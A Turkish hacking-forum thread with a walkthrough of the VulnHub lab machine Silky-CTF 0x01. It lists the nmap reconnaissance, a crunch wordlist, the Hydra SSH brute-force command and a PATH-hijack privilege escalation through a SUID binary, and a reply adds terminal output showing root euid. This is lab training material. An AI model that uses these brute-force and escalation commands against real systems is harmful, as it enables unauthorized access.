Silky-CTF: 0x01 Zafiyetli Makinesinin Çözümü//"P4RS

P4RS

Özel Üye
8 Ocak 2017
5,156
58
Ankara
Merhabalar TürkHackTeam ailesi, bugün sizlere "Silky-CTF: 0x01 Zafiyetli Makinesinin Çözümünü" göstereceğim.

APM7O5.png


https://www.vulnhub.com/entry/silky-ctf-0x01,306/

5xJRdf.png


Makine İsmi: Silky-CTF: 0x01

Yayınlanma Tarihi: 27 Nisan 2019

Yapımcı: Silky

Seri: Silky-CTF

Açıklama: Hedefteki Root dizinin de ki Flag'a erişmek

Dosya Boyutu: 2.5 GB

İşletim Sistemi: Linux

Zorluk Derecesi:
Kolay-Orta


RGQJLC.gif


İlk öncelikle makinenin IP adresini öğrenmek için
Kod:
sudo netdiscover
yazıyoruz.

HCefxM.jpg


Hedefimiz IP adresini bu şekilde öğrenmiş olduk.

x3aPc8.jpg


NMAP taraması yaparak hangi portların açık olduğunu öğrenmek için
Kod:
nmap -A IP_ADRESİ
yazalım. Gördüğünüz gibi 22 ve 80 portları açık ve burada önemli olan mavi alana aldığım robots.txt ve notes.txt yolları

aJyUOR.jpg


80 portunun açık olması bir site açık olduğunu anladım içeri girince apache tabanlı bir site olduğunu gördüm.

OM8MIy.jpg


İlk robots.txt'e gittim beni notes.txt kısmına yönlendirdi oradan görüntü fakat Almanca bir yazı yazılmış.

HT3xRx.jpg


Çevirdiğimizde "Şifreyi sayfadan yok etmesi gerekiyor, her şeye rağmen sonda ki 2 karakter kayıpmış. "

Ke8LcN.jpg


Siteye tekrar geldim ve kodlara baktığımda script.js dosyasında bir şeyler buldum.

9G0QTO.jpg


Gördüğünüz gibi şifreye ait bir değer bulduk.

zPN2yA.jpg


Bizlere ipucu olarak son 2 karakter kayıp demişti. Şifre listesini crunch aracı ile oluşturacağım terminale
Kod:
crunch 7 7 -t s1lKy^% >> sifre.txt
yazdım ve şifre listesi oluştu.

M3bWQV.jpg


Hydra aracı ile de ssh servisine brute saldırısı yapacağız. Terminale
Kod:
hydra -l silky -P sifre.txt IP_ADRES ssh
yazalım ve şifremizi alalım.

PfcTxR.jpg


SSH olarak bağlanmak için terminale
Kod:
ssh silky@IP_ADRES
yazalım.

J37bP4.jpg


SUID özellikli dosyaları aradım ve burada ki /usr/bin/sky dosyası gözüme takıldı ve terminale
Kod:
/usr/bin/sky
yazdırdığımda Almanca bir metin ve root yazdığını gördüm.

abc2eJ.jpg


Almanca bir metin ve whoami komutu çalıştırılmış.

U0V0W8.jpg


Hc614c.jpg


Kök ayrıcalığını yükseltmek için PATH değişkenini kullanacağım. Bunun için
Kod:
echo '/bin/sh' > whoami
chmod 777 whoami
export PATH=/tmp:$PATH
/usr/bin/sky
ilginç bir şekilde id yazdığımda root yetkisini alamadım fakat
Kod:
cd /root
yazdığımda giriş yaptım ve flag.txt dosyasını yazdırmam da bir izin hatası almadım :trl bayrağı da almış oldu :))



SUMJax.jpg



Konum bu kadardı arkadaşlar, başka bir konuda görüşmek üzere sağlıcakla...

 
Son düzenleme:

ZoRRoKiN

Özel Üye
7 Ağu 2005
2,149
377
WORLD
id yazdığınızda yetki alamıyorsanız bir de şu şekilde deneyin.

Kod:
silky@Silky-CTF:/tmp$ cd /tmp
silky@Silky-CTF:/tmp$ ls
hsperfdata_root
pulse-PKdhtXMmr18n
systemd-private-d672f2af828d44d481839d78868a14d5-apache2.service-V58Rge
systemd-private-d672f2af828d44d481839d78868a14d5-colord.service-a7R6Hh
systemd-private-d672f2af828d44d481839d78868a14d5-rtkit-daemon.service-8bWI5m
systemd-private-d672f2af828d44d481839d78868a14d5-systemd-timesyncd.service-HmZtVn
silky@Silky-CTF:/tmp$ echo '/bin/sh' > whoami
silky@Silky-CTF:/tmp$ chmod 777 whoami
silky@Silky-CTF:/tmp$ ls
hsperfdata_root
pulse-PKdhtXMmr18n
systemd-private-d672f2af828d44d481839d78868a14d5-apache2.service-V58Rge
systemd-private-d672f2af828d44d481839d78868a14d5-colord.service-a7R6Hh
systemd-private-d672f2af828d44d481839d78868a14d5-rtkit-daemon.service-8bWI5m
systemd-private-d672f2af828d44d481839d78868a14d5-systemd-timesyncd.service-HmZtVn
whoami
silky@Silky-CTF:/tmp$ export PATH=/tmp:$PATH
silky@Silky-CTF:/tmp$ /usr/bin/sky
Seide ist ein tierischer Faserstoff. Sie wird aus den Kokons der Seidenraupe, der Larve des Seidenspinners, gewonnen. 
gezeichnet:
# id
uid=1000(silky) gid=1000(silky) euid=0(root) Gruppen=1000(silky),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),113(bluetooth),114(lpadmin),119(scanner)
#
 
Son düzenleme:

P4RS

Özel Üye
8 Ocak 2017
5,156
58
Ankara
id yazdığınızda yetki alamıyorsanız bir de şu şekilde deneyin.

Kod:
silky@Silky-CTF:/tmp$ cd /tmp
silky@Silky-CTF:/tmp$ ls
hsperfdata_root
pulse-PKdhtXMmr18n
systemd-private-d672f2af828d44d481839d78868a14d5-apache2.service-V58Rge
systemd-private-d672f2af828d44d481839d78868a14d5-colord.service-a7R6Hh
systemd-private-d672f2af828d44d481839d78868a14d5-rtkit-daemon.service-8bWI5m
systemd-private-d672f2af828d44d481839d78868a14d5-systemd-timesyncd.service-HmZtVn
silky@Silky-CTF:/tmp$ echo '/bin/sh' > whoami
silky@Silky-CTF:/tmp$ chmod 777 whoami
silky@Silky-CTF:/tmp$ ls
hsperfdata_root
pulse-PKdhtXMmr18n
systemd-private-d672f2af828d44d481839d78868a14d5-apache2.service-V58Rge
systemd-private-d672f2af828d44d481839d78868a14d5-colord.service-a7R6Hh
systemd-private-d672f2af828d44d481839d78868a14d5-rtkit-daemon.service-8bWI5m
systemd-private-d672f2af828d44d481839d78868a14d5-systemd-timesyncd.service-HmZtVn
whoami
silky@Silky-CTF:/tmp$ export PATH=/tmp:$PATH
silky@Silky-CTF:/tmp$ /usr/bin/sky
Seide ist ein tierischer Faserstoff. Sie wird aus den Kokons der Seidenraupe, der Larve des Seidenspinners, gewonnen. 
gezeichnet:
# id
uid=1000(silky) gid=1000(silky) euid=0(root) Gruppen=1000(silky),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),113(bluetooth),114(lpadmin),119(scanner)
#

Bilgilendirme için teşekkür ederim hocam :))
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.